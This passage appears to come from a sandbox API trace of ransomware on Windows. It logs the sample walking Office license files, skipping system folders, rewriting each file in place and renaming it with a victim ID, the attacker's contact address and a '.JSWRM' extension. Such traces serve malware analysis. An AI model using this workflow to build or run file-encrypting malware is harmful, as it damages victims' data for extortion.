nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0111.677] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.677] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0111.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.677] CloseHandle (hObject=0x45c) returned 1 [0111.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0111.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0111.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0111.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.677] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0111.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0111.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0111.678] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec3bd264, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec3bd264, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec560c57, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail2-ul-phn.xrm-ms", cAlternateFileName="VIB086~1.XRM")) returned 1 [0111.678] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2=".") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="..") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="...") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="windows") returned -1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0111.679] lstrcmpiW (lpString1="VisioProR_Retail2-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0111.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0111.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0111.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241010, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0111.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0111.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0111.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.680] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19935) returned 1 [0111.680] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0111.680] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0111.683] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.683] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0111.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.690] CloseHandle (hObject=0x45c) returned 1 [0111.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0111.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0111.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0111.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.691] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0111.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0111.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0111.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0111.692] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec39700f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec39700f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec51479d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Trial-pl.xrm-ms", cAlternateFileName="VI0D51~1.XRM")) returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="recovery") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.692] lstrcmpiW (lpString1="VisioProR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0111.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0111.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0111.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0111.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241100, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0111.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0111.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0111.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0111.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0111.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0111.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0111.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0111.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0111.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.693] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11151) returned 1 [0111.694] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0111.694] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0111.698] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.698] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0111.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.698] CloseHandle (hObject=0x45c) returned 1 [0111.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0111.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0111.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0111.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0111.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.698] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0111.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0111.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0111.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0111.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0111.699] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec5ad0ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec5ad0ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec61f824, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51f1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Trial-ppd.xrm-ms", cAlternateFileName="VI6B36~1.XRM")) returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.700] lstrcmpiW (lpString1="VisioProR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0111.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0111.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0111.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0111.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0111.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 